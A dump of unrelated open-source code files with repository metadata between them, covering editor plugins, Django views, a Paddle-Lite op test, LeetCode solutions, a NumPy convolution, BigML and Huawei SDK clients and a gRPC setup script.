    def run(self, edit):
        blocks = extract_line_blocks(self.view)

        # No selection
        if len(blocks) == 0:
            return
        # Already at EOF
        if blocks[-1].end() == self.view.size():
            return

        # Add a trailing newline if required, the logic is simpler if every line
        # ends with a newline
        add_trailing_newline = (self.view.substr(self.view.size() - 1) != '\n')
        if add_trailing_newline:
            # No block can be at EOF (checked above), so no need to fix up the
            # blocks
            self.view.insert(edit, self.view.size(), '\n')

        # Process in reverse order
        blocks.reverse()
        for b in blocks:
            # Cut the line below the block and re-insert it above the block —
            # net effect: the block moves down one line.
            next_line = self.view.full_line(b.end())
            contents = self.view.substr(next_line)
            self.view.erase(edit, next_line)
            self.view.insert(edit, b.begin(), contents)

        if add_trailing_newline:
            # Remove the added newline
            self.view.erase(edit, sublime.Region(self.view.size() - 1, self.view.size()))

        # Ensure the selection is visible
        self.view.show(self.view.sel(), False)
|
[
"guan2296107714@126.com"
] |
guan2296107714@126.com
|
e62ab15957a3c82e8578924508c3baeabde046be
|
b550eda62179ffd8e49a59df7f8a30163140204f
|
/backend/openshift-old/services/job/worker/src/nodes/requests/openshift.py
|
169b62b8c283420c6106a524f7d57862ca40833b
|
[
"Apache-2.0"
] |
permissive
|
bgoesswe/openeo-repeatability
|
6222fb235b70fda9da998b63fec92c0e5ac07169
|
087b9965e710d16cd6f29cb25e2cb94e443c2b30
|
refs/heads/master
| 2022-12-11T03:43:35.365574
| 2018-08-07T20:02:02
| 2018-08-07T20:02:02
| 139,158,921
| 0
| 1
| null | 2022-12-08T02:15:15
| 2018-06-29T14:27:34
|
Python
|
UTF-8
|
Python
| false
| false
| 801
|
py
|
from os import environ
from utils import send_post
# OPENSHIFT_URL = environ.get("OPENSHIFT_API")
# OPENSHIFT_AUTH = auth = {"Authorization": "Bearer " + environ.get("SERVICEACCOUNT_TOKEN")}
# OPENSHIFT_NAMESPACE = environ.get("EXECUTION_NAMESPACE")
# OPENSHIFT_STORAGE_CLASS = environ.get("STORAGE_CLASS")
# OPENSHIFT_VERIFY = True if environ.get("VERIFY") == "true" else False
# def execute_template(path, template):
# url = "{0}/{1}".format(OPENSHIFT_URL, path)
# send_post(url, template, OPENSHIFT_AUTH, OPENSHIFT_VERIFY)
# url = environ.get("OPENSHIFT_API") + self.path
# response = post(url, data=self.get_json(), headers=auth, verify=verify)
# verify =
# # Execute template
# if response.ok == False:
# self.raise_error(response.text)
# self.status = "Created"
|
[
"bernhard.goesswein@geo.tuwien.ac.at"
] |
bernhard.goesswein@geo.tuwien.ac.at
|
72455241a618db9120f1ce31fffb5ed5a14566bd
|
fbfb724f8d0c3a6b64b2d6773c6f723bedb9f7f5
|
/Python/Django_full/courses/apps/course_app/views.py
|
49c2de66092e1c0453f40735e9ff07ab1f17f2ca
|
[] |
no_license
|
eddieverity/DojoAssignments
|
32ae4a1de768069d6636d1f109845e86bb20dec5
|
8860b4ca87633e722fa5aa93952ea719e9e95413
|
refs/heads/master
| 2020-04-06T03:59:56.185985
| 2017-04-26T18:04:41
| 2017-04-26T18:04:41
| 83,149,714
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 763
|
py
|
from django.shortcuts import render, redirect, HttpResponse
from .models import Course, Description, Comment
# Create your views here.
def index(request):
    """Render the landing page listing every course and every description."""
    return render(request, "course_app/index.html", {
        "courses": Course.objects.all(),
        "desc": Description.objects.all(),
    })
def go_back(request):
    """Send the user back to the index page."""
    return redirect('/')
def add(request):
    """Create a Course and its Description from the POSTed form fields."""
    course = Course.objects.create(name=request.POST['name']) # course automatically getting assigned course_id, then referenced in description.create below
    Description.objects.create(desc=request.POST['desc'], course=course)
    return redirect('/')
def delete(request, id):
    """Delete the course with the given primary key, then return home.

    ``id`` shadows the builtin, but the name is kept because the URLconf
    passes it as a keyword argument.
    """
    # filter().delete() is a no-op for an unknown id, so no 404 handling is
    # needed; the previously captured return value was never used.
    Course.objects.filter(id=id).delete()
    return redirect('/')
|
[
"eddieverity@gmail.com"
] |
eddieverity@gmail.com
|
a5146ae5de1b53ffccabf6a5318027797a5bb10a
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_psoriasis.py
|
8b4a1ae76769598d8296034103fda0e42994b41d
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
#calss header
class _PSORIASIS():
def __init__(self,):
self.name = "PSORIASIS"
self.definitions = [u'a disease in which areas of skin turn red and are covered with small dry pieces of skin']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
ac87a80c7946de405af73d9d842c2e7763946960
|
fee6d256bb4430569f9c055735d5f52a04afac45
|
/admin/town_get.py
|
3c317a73eecfa09a13f9b9e9edfd840faf725e1f
|
[] |
no_license
|
microprediction/pandemic
|
633367e3a11af1418e255a595b4c01a9c1f4c1bb
|
4ca339b8c6e1925d7d70e9659b34e7cf8d7b534b
|
refs/heads/master
| 2021-05-23T15:27:12.726299
| 2020-11-12T13:52:56
| 2020-11-12T13:52:56
| 253,360,903
| 9
| 8
| null | 2020-05-18T14:00:25
| 2020-04-06T00:34:55
|
Python
|
UTF-8
|
Python
| false
| false
| 260
|
py
|
from pandemic.config_private import REDIS_CONFIG
from pprint import pprint
import json
if __name__=="__main__":
    # Local import: redis is only needed when run as a script.
    import redis
    r = redis.Redis(**REDIS_CONFIG)
    # NOTE(review): `key` is never used below -- looks like a leftover from a
    # per-record lookup; confirm before removing.
    key = '00021250616501801290085'
    # Dump the entire town hash (field -> value, both bytes) for inspection.
    data = r.hgetall(name='town::hash')
    pprint(data)
|
[
"info@3za.org"
] |
info@3za.org
|
7aba0b9e83fa79101172ddd4c5618b3be76aada9
|
d17a8870ff8ac77b82d0d37e20c85b23aa29ca74
|
/lite/tests/unittest_py/op/common/test_unsqueeze_op_base.py
|
2501e10cdaad936fb10b222f6afd2e47286d2faa
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle-Lite
|
4ab49144073451d38da6f085a8c56822caecd5b2
|
e241420f813bd91f5164f0d9ee0bc44166c0a172
|
refs/heads/develop
| 2023-09-02T05:28:14.017104
| 2023-09-01T10:32:39
| 2023-09-01T10:32:39
| 104,208,128
| 2,545
| 1,041
|
Apache-2.0
| 2023-09-12T06:46:10
| 2017-09-20T11:41:42
|
C++
|
UTF-8
|
Python
| false
| false
| 2,275
|
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import assume
import hypothesis.strategies as st
def sample_program_configs(draw):
    """Hypothesis strategy body: draw a random `unsqueeze` op program config.

    NOTE: the order of the `draw` calls must not change -- hypothesis
    replays failing examples by re-drawing in sequence.
    """
    # 4-D input shape, every dim in [1, 5].
    in_shape = draw(
        st.lists(
            st.integers(
                min_value=1, max_value=5), min_size=4, max_size=4))
    # 1 or 2 axes to insert, each an index in [0, 3]; also reused below as
    # the *shape* of the AxesTensor input.
    axes_data = draw(
        st.lists(
            st.integers(
                min_value=0, max_value=3), min_size=1, max_size=2))
    def generate_AxesTensor_data():
        # Tensor variant of the axes attribute (shape follows axes_data).
        return np.random.choice([0, 1, 2, 3], axes_data, replace=True)
    def generate_AxesTensorList_data():
        # 0-d draw used for the (unsupported) tensor-list input variant.
        return np.random.choice([0, 1, 2, 3], [], replace=True)
    unsqueeze_op = OpConfig(
        type="unsqueeze",
        inputs={
            "X": ["X_data"],
            "AxesTensor": ["AxesTensor_data"],
            "AxesTensorList": ["AxesTensorList_data"]
        },
        outputs={"Out": ["Out_data"]},
        attrs={"axes": axes_data, })
    program_config = ProgramConfig(
        ops=[unsqueeze_op],
        weights={},
        inputs={
            "X_data": TensorConfig(shape=in_shape),
            "AxesTensor_data":
            TensorConfig(data_gen=partial(generate_AxesTensor_data)),
            # TensorList is not supported ,so comment them out
            "AxesTensorList_data":
            TensorConfig(data_gen=partial(generate_AxesTensorList_data))
        },
        outputs=["Out_data"])
    return program_config
|
[
"noreply@github.com"
] |
PaddlePaddle.noreply@github.com
|
d86b2af56d25376ca533a9b8f5974a461cddc95f
|
41e22cef6ded081632f21cd3877884f76c69bef3
|
/flaskmob/api.py
|
2835e31958cc88e0b8e048455be2281aea280abb
|
[
"MIT"
] |
permissive
|
brotherjack/Flask-Mob
|
737cac3623c8a062653e2eefa981de30526b4510
|
f0f4f5fe79f2fe7e63c2f882dc4b5d61276dbf45
|
refs/heads/master
| 2021-01-20T09:37:26.091977
| 2017-03-04T22:09:56
| 2017-03-04T22:09:56
| 83,924,618
| 0
| 0
| null | 2017-03-04T21:03:59
| 2017-03-04T21:03:59
| null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
from flask import jsonify
from flaskmob import app, db
from flask_restful import Resource, Api
api = Api(app)
class Pokeymon(db.Model):
    """SQLAlchemy model: one row per pokeymon, unique by name."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String, unique=True)
    color = db.Column(db.String)
    def __init__(self, name, color=None):
        """Create a pokeymon; any falsy color is stored as "Not Specified"."""
        if not color:
            color = "Not Specified"
        self.name = name
        self.color = color
    def __repr__(self):
        # Shown wherever the model is rendered as text (shell, debug logs).
        return str(self.name)
class PokeymonNapTime(Resource):
    """Flask-RESTful resource exposing a single pokeymon by name."""
    def get(self, name):
        """Return the named pokeymon's columns as JSON."""
        result = Pokeymon.query.filter_by(name=name).first()
        # HACK: strip SQLAlchemy's internal state so __dict__ is JSON-safe.
        # NOTE(review): `result` is None for an unknown name, so this raises
        # AttributeError -- confirm whether a 404 response is wanted instead.
        del result.__dict__['_sa_instance_state']
        return jsonify(result.__dict__)
    def post(self, name, color=None):
        """Insert a new pokeymon; roll back the session and re-raise on failure."""
        new_pokeymon = Pokeymon(name, color)
        db.session.add(new_pokeymon)
        try:
            db.session.commit()
        except:
            # Bare except is deliberate: undo the session, then propagate.
            db.session.rollback()
            raise
        return "Success"
api.add_resource(PokeymonNapTime, "/api/1.0/pokeyman/<string:name>")
|
[
"michael@mdupont.com"
] |
michael@mdupont.com
|
d84f0b803d8be1aa81bc7e7291137ca415656a52
|
9870d2c6880fd3fa558c46e3bf160aae20c74157
|
/removeNthFromEnd.py
|
5719f47e75ed040bbcce08e05727590f9c52fbbc
|
[] |
no_license
|
Yigang0622/LeetCode
|
e7f7f115c6e730c486296ef2f1a3dd1a3fdca526
|
c873cd1ee70a2bdb54571bdd50733db9f6475e9e
|
refs/heads/master
| 2023-03-03T14:32:25.498633
| 2021-02-15T13:59:00
| 2021-02-15T13:59:00
| 281,423,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,322
|
py
|
# LeetCode
# removeNthFromEnd
# Created by Yigang Zhou on 2020/7/22.
# Copyright © 2020 Yigang Zhou. All rights reserved.
# 给定一个链表,删除链表的倒数第 n 个节点,并且返回链表的头结点。
#
# 示例:
#
# 给定一个链表: 1->2->3->4->5, 和 n = 2.
#
# 当删除了倒数第二个节点后,链表变为 1->2->3->5.
# 说明:
#
# 给定的 n 保证是有效的。
#
# 进阶:
#
# 你能尝试使用一趟扫描实现吗?
#Definition for singly-linked list.
class ListNode:
    """One element of a singly linked list: a payload plus a `next` pointer."""
    def __init__(self, x):
        # Node starts detached; callers wire up `next` themselves.
        self.next = None
        self.val = x
def printLinkedList(head: ListNode):
    """Walk the list starting at `head`, printing one value per line."""
    node = head
    while node is not None:
        print(node.val)
        node = node.next
class Solution:
    def removeNthFromEnd(self, head: 'ListNode', n: int) -> 'ListNode':
        """Remove the n-th node from the end of the list; return the new head.

        One pass collects the nodes into a list, then the target index is
        computed directly: O(L) time, O(L) auxiliary space.

        Fixes vs. the original version:
        * returns None (not an empty list) when removing the only node, so
          the return type is consistent with the annotation;
        * the debug printLinkedList() side effect inside the algorithm is
          gone -- callers print the result themselves if they want to;
        * string annotations so the class no longer depends on ListNode
          being defined first.
        """
        nodes = []
        while head is not None:
            nodes.append(head)
            head = head.next
        if len(nodes) == 1:
            # Removing the single node empties the list.
            return None
        i = len(nodes) - n - 1
        if i == -1:
            # The old head is the node to drop; the list now starts at [1].
            return nodes[1]
        nodes[i].next = nodes[i].next.next
        return nodes[0]
# Ad-hoc smoke test: build 1->2->3->4 and remove the 4th node from the end
# (i.e. the head), leaving 2->3->4.
n = ListNode(1)
n2 = ListNode(2)
n3 = ListNode(3)
n4 = ListNode(4)
n.next = n2
n2.next = n3
n3.next = n4
s = Solution().removeNthFromEnd(n,4)
|
[
"zhou@zygmail.com"
] |
zhou@zygmail.com
|
13549ec011843c3269631dae4df79481e9adcee9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03759/s647507996.py
|
7c66b69c12d94e46dcce65b1e8b12fc11d1775b6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
# Read three integers from stdin and report whether they form an
# arithmetic progression (equal consecutive gaps).
values = [int(token) for token in input().split()]
first, second, third = values[0], values[1], values[2]
if second - first == third - second:
    print('YES')
else:
    print('NO')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
54dc0172f201f8adc5440482208dbc2e4a20f88b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/Fe6wvtjcNFwuANuLu_1.py
|
19b5746b7b1b7d4c659dd13e0c67a617790fb718
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
"""
A game of table tennis almost always sounds like _Ping!_ followed by _Pong!_
Therefore, you know that Player 2 has won if you hear _Pong!_ as the last
sound (since Player 1 didn't return the ball back).
Given a list of _Ping!_ , create a function that inserts _Pong!_ in between
each element. Also:
* If `win` equals `True`, end the list with _Pong!_.
* If `win` equals `False`, end with _Ping!_ instead.
### Examples
ping_pong(["Ping!"], True) ➞ ["Ping!", "Pong!"]
ping_pong(["Ping!", "Ping!"], False) ➞ ["Ping!", "Pong!", "Ping!"]
ping_pong(["Ping!", "Ping!", "Ping!"], True) ➞ ["Ping!", "Pong!", "Ping!", "Pong!", "Ping!", "Pong!"]
### Notes
* You will always return the ball (i.e. the Pongs are yours).
* Player 1 serves the ball and makes _Ping!_.
* Return a list of strings.
"""
def ping_pong(lst, win):
    """Answer every Ping! with a Pong!; drop the final Pong! on a loss.

    Each serve in *lst* gets a return, so the rally is twice as long as
    *lst* when Player 2 wins (``win`` is True). Otherwise the last return
    never happens and the rally ends on a Ping!.
    """
    rally = []
    for _ in lst:
        rally.append('Ping!')
        rally.append('Pong!')
    return rally if win else rally[:-1]
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
d8656572c733b1f9a10bc318e47dbba7721dca6b
|
beea74a2a1f2445b107af411197e8b6300e715e6
|
/supervised_learning/0x07-cnn/0-conv_forward.py
|
ce94808fac80cec28daaffce4ba0d4471128adfc
|
[] |
no_license
|
95ktsmith/holbertonschool-machine_learning
|
0240d8fa8523b06d3353c2bffa74205b84253be8
|
2757c8526290197d45a4de33cda71e686ddcbf1c
|
refs/heads/master
| 2023-07-26T16:02:26.399758
| 2021-09-09T15:57:57
| 2021-09-09T15:57:57
| 310,087,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,360
|
py
|
#!/usr/bin/env python3
""" Convolution forward propagation """
import numpy as np
def conv_forward(A_prev, W, b, activation, padding="same", stride=(1, 1)):
    """Forward-propagate one convolutional layer.

    Args:
        A_prev: np.ndarray (m, h_prev, w_prev, c_prev), previous activations.
        W: np.ndarray (kh, kw, c_prev, c_new), the convolution kernels.
        b: np.ndarray (1, 1, 1, c_new), per-output-channel biases.
        activation: callable applied elementwise to the convolved output.
        padding: "same" (output keeps input H/W) or "valid" (no padding).
        stride: (sh, sw) vertical/horizontal strides.

    Returns:
        np.ndarray (m, out_h, out_w, c_new): the layer's activations.
    """
    m, in_h, in_w, _ = A_prev.shape
    kh, kw, _, c_new = W.shape
    sh, sw = stride

    if padding == "valid":
        pad_h = 0
        pad_w = 0
        out_h = int((in_h - kh) / sh + 1)
        out_w = int((in_w - kw) / sw + 1)
    else:  # "same": output spatial size equals the input's
        out_h = in_h
        out_w = in_w
        pad_h = int((out_h * sh - in_h + kh - 1) / 2)
        pad_w = int((out_w * sw - in_w + kw - 1) / 2)

    # Zero-pad height and width only.
    padded = np.pad(A_prev,
                    ((0, 0), (pad_h, pad_h), (pad_w, pad_w), (0, 0)),
                    'constant',
                    constant_values=0)

    out = np.zeros((m, out_h, out_w, c_new))
    for row in range(out_h):
        top = row * sh
        for col in range(out_w):
            left = col * sw
            # One receptive field across the whole batch.
            window = padded[:, top:top + kh, left:left + kw, :]
            for ch in range(c_new):
                products = window * W[None, :, :, :, ch]
                z = np.sum(products, axis=(1, 2, 3)) + b[:, :, :, ch]
                out[:, row, col, ch] = activation(z)
    return out
|
[
"95ktsmith@gmail.com"
] |
95ktsmith@gmail.com
|
3c516ada6af314021aa4340dc715126b4d3b5c3d
|
2e94ded940d9a8015f5cf877bfbef71a77b5ddaf
|
/bigml/api_handlers/clusterhandler.py
|
133a66bc205f295795f8d4e768542ab1a9575aa3
|
[
"Apache-2.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mmerce/python
|
9ac63efacec3e54285a969b6c6279eeba6bceb78
|
696ddc2a10c985cfe266ec2807c24b98f0c9a317
|
refs/heads/master
| 2023-08-04T09:10:17.016748
| 2020-11-10T23:43:34
| 2020-11-10T23:43:34
| 5,256,921
| 0
| 0
| null | 2017-10-03T22:54:20
| 2012-08-01T08:38:09
|
Python
|
UTF-8
|
Python
| false
| false
| 3,898
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright 2014-2020 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Base class for clusters' REST calls
https://bigml.com/api/clusters
"""
try:
import simplejson as json
except ImportError:
import json
from bigml.api_handlers.resourcehandler import ResourceHandlerMixin
from bigml.api_handlers.resourcehandler import check_resource_type, \
resource_is_ready, get_cluster_id
from bigml.constants import CLUSTER_PATH
class ClusterHandlerMixin(ResourceHandlerMixin):
    """This class is used by the BigML class as
    a mixin that provides the cluster REST calls. It should not
    be instantiated independently.
    """
    def __init__(self):
        """Initializes the ClusterHandler. This class is intended to be
        used as a mixin on ResourceHandler, that inherits its
        attributes and basic method from BigMLConnection, and must not be
        instantiated independently.
        """
        # self.url is provided by the BigMLConnection side of the mixin chain.
        self.cluster_url = self.url + CLUSTER_PATH
    def create_cluster(self, datasets, args=None, wait_time=3, retries=10):
        """Creates a cluster from a `dataset` or a list of `datasets`.
        """
        # Waits (wait_time seconds, up to `retries` times) for the origin
        # datasets to be ready before building the request payload.
        create_args = self._set_create_from_datasets_args(
            datasets, args=args, wait_time=wait_time, retries=retries)
        body = json.dumps(create_args)
        return self._create(self.cluster_url, body)
    def get_cluster(self, cluster, query_string='',
                    shared_username=None, shared_api_key=None):
        """Retrieves a cluster.

        The model parameter should be a string containing the
        cluster id or the dict returned by create_cluster.
        As cluster is an evolving object that is processed
        until it reaches the FINISHED or FAULTY state, the function will
        return a dict that encloses the cluster values and state info
        available at the time it is called.

        If this is a shared cluster, the username and sharing api key must
        also be provided.
        """
        check_resource_type(cluster, CLUSTER_PATH,
                            message="A cluster id is needed.")
        return self.get_resource(cluster,
                                 query_string=query_string,
                                 shared_username=shared_username,
                                 shared_api_key=shared_api_key)
    def cluster_is_ready(self, cluster, **kwargs):
        """Checks whether a cluster's status is FINISHED.
        """
        check_resource_type(cluster, CLUSTER_PATH,
                            message="A cluster id is needed.")
        # kwargs are forwarded to get_cluster (e.g. query_string, shared_*).
        resource = self.get_cluster(cluster, **kwargs)
        return resource_is_ready(resource)
    def list_clusters(self, query_string=''):
        """Lists all your clusters.
        """
        return self._list(self.cluster_url, query_string)
    def update_cluster(self, cluster, changes):
        """Updates a cluster.
        """
        check_resource_type(cluster, CLUSTER_PATH,
                            message="A cluster id is needed.")
        return self.update_resource(cluster, changes)
    def delete_cluster(self, cluster):
        """Deletes a cluster.
        """
        check_resource_type(cluster, CLUSTER_PATH,
                            message="A cluster id is needed.")
        return self.delete_resource(cluster)
|
[
"merce@bigml.com"
] |
merce@bigml.com
|
6eab9a88af0ceee39b0d08197e81ce32a0290429
|
88ae8695987ada722184307301e221e1ba3cc2fa
|
/third_party/grpc/src/src/python/grpcio_csds/setup.py
|
6523648516b6ebe0624f0243eb91978bdf3a3b93
|
[
"Apache-2.0",
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MPL-2.0"
] |
permissive
|
iridium-browser/iridium-browser
|
71d9c5ff76e014e6900b825f67389ab0ccd01329
|
5ee297f53dc7f8e70183031cff62f37b0f19d25f
|
refs/heads/master
| 2023-08-03T16:44:16.844552
| 2023-07-20T15:17:00
| 2023-07-23T16:09:30
| 220,016,632
| 341
| 40
|
BSD-3-Clause
| 2021-08-13T13:54:45
| 2019-11-06T14:32:31
| null |
UTF-8
|
Python
| false
| false
| 2,120
|
py
|
# Copyright 2021 The gRPC Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup module for CSDS in gRPC Python."""
import os
import sys
import setuptools
_PACKAGE_PATH = os.path.realpath(os.path.dirname(__file__))
_README_PATH = os.path.join(_PACKAGE_PATH, 'README.rst')
# Ensure we're in the proper directory whether or not we're being used by pip.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Break import-style to ensure we can actually find our local modules.
import grpc_version
# Trove classifiers describing the supported environments.
CLASSIFIERS = [
    'Development Status :: 5 - Production/Stable',
    'Programming Language :: Python',
    'Programming Language :: Python :: 3',
    'License :: OSI Approved :: Apache Software License',
]
PACKAGE_DIRECTORIES = {
    '': '.',
}
INSTALL_REQUIRES = (
    'protobuf>=4.21.6',
    'xds-protos>=0.0.7',
    'grpcio>={version}'.format(version=grpc_version.VERSION),
)
SETUP_REQUIRES = INSTALL_REQUIRES
# Read the long description up front with a context manager so the file
# handle is closed deterministically (the previous inline open() leaked it).
with open(_README_PATH, 'r') as _readme_file:
    _LONG_DESCRIPTION = _readme_file.read()
setuptools.setup(name='grpcio-csds',
                 version=grpc_version.VERSION,
                 license='Apache License 2.0',
                 description='xDS configuration dump library',
                 long_description=_LONG_DESCRIPTION,
                 author='The gRPC Authors',
                 author_email='grpc-io@googlegroups.com',
                 classifiers=CLASSIFIERS,
                 url='https://grpc.io',
                 package_dir=PACKAGE_DIRECTORIES,
                 packages=setuptools.find_packages('.'),
                 python_requires='>=3.6',
                 install_requires=INSTALL_REQUIRES,
                 setup_requires=SETUP_REQUIRES)
|
[
"jengelh@inai.de"
] |
jengelh@inai.de
|
20119dd4bf027bc85b6d0743586dd8843d61e207
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-sa/huaweicloudsdksa/v2/model/update_playbook_action_request.py
|
65f38548f9f7ce143f3cb61570505abafe3b769a
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 6,398
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
# Auto-generated OpenAPI request model (huaweicloudsdk generator style):
# openapi_types/attribute_map drive the SDK's (de)serialization machinery.
class UpdatePlaybookActionRequest:
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attributes listed here are masked as "****" by to_dict().
    sensitive_list = []
    openapi_types = {
        'project_id': 'str',
        'workspace_id': 'str',
        'version_id': 'str',
        'action_id': 'str',
        'body': 'ModifyActionInfo'
    }
    attribute_map = {
        'project_id': 'project_id',
        'workspace_id': 'workspace_id',
        'version_id': 'version_id',
        'action_id': 'action_id',
        'body': 'body'
    }
    def __init__(self, project_id=None, workspace_id=None, version_id=None, action_id=None, body=None):
        """UpdatePlaybookActionRequest
        The model defined in huaweicloud sdk
        :param project_id: ID of project
        :type project_id: str
        :param workspace_id: ID of workspace
        :type workspace_id: str
        :param version_id: version Id value
        :type version_id: str
        :param action_id: ID of action
        :type action_id: str
        :param body: Body of the UpdatePlaybookActionRequest
        :type body: :class:`huaweicloudsdksa.v2.ModifyActionInfo`
        """
        self._project_id = None
        self._workspace_id = None
        self._version_id = None
        self._action_id = None
        self._body = None
        self.discriminator = None
        # Assignments go through the property setters below.
        self.project_id = project_id
        self.workspace_id = workspace_id
        self.version_id = version_id
        self.action_id = action_id
        if body is not None:
            self.body = body
    @property
    def project_id(self):
        """Gets the project_id of this UpdatePlaybookActionRequest.
        ID of project
        :return: The project_id of this UpdatePlaybookActionRequest.
        :rtype: str
        """
        return self._project_id
    @project_id.setter
    def project_id(self, project_id):
        """Sets the project_id of this UpdatePlaybookActionRequest.
        ID of project
        :param project_id: The project_id of this UpdatePlaybookActionRequest.
        :type project_id: str
        """
        self._project_id = project_id
    @property
    def workspace_id(self):
        """Gets the workspace_id of this UpdatePlaybookActionRequest.
        ID of workspace
        :return: The workspace_id of this UpdatePlaybookActionRequest.
        :rtype: str
        """
        return self._workspace_id
    @workspace_id.setter
    def workspace_id(self, workspace_id):
        """Sets the workspace_id of this UpdatePlaybookActionRequest.
        ID of workspace
        :param workspace_id: The workspace_id of this UpdatePlaybookActionRequest.
        :type workspace_id: str
        """
        self._workspace_id = workspace_id
    @property
    def version_id(self):
        """Gets the version_id of this UpdatePlaybookActionRequest.
        version Id value
        :return: The version_id of this UpdatePlaybookActionRequest.
        :rtype: str
        """
        return self._version_id
    @version_id.setter
    def version_id(self, version_id):
        """Sets the version_id of this UpdatePlaybookActionRequest.
        version Id value
        :param version_id: The version_id of this UpdatePlaybookActionRequest.
        :type version_id: str
        """
        self._version_id = version_id
    @property
    def action_id(self):
        """Gets the action_id of this UpdatePlaybookActionRequest.
        ID of action
        :return: The action_id of this UpdatePlaybookActionRequest.
        :rtype: str
        """
        return self._action_id
    @action_id.setter
    def action_id(self, action_id):
        """Sets the action_id of this UpdatePlaybookActionRequest.
        ID of action
        :param action_id: The action_id of this UpdatePlaybookActionRequest.
        :type action_id: str
        """
        self._action_id = action_id
    @property
    def body(self):
        """Gets the body of this UpdatePlaybookActionRequest.
        :return: The body of this UpdatePlaybookActionRequest.
        :rtype: :class:`huaweicloudsdksa.v2.ModifyActionInfo`
        """
        return self._body
    @body.setter
    def body(self, body):
        """Sets the body of this UpdatePlaybookActionRequest.
        :param body: The body of this UpdatePlaybookActionRequest.
        :type body: :class:`huaweicloudsdksa.v2.ModifyActionInfo`
        """
        self._body = body
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively convert nested models/containers; mask sensitive fields.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
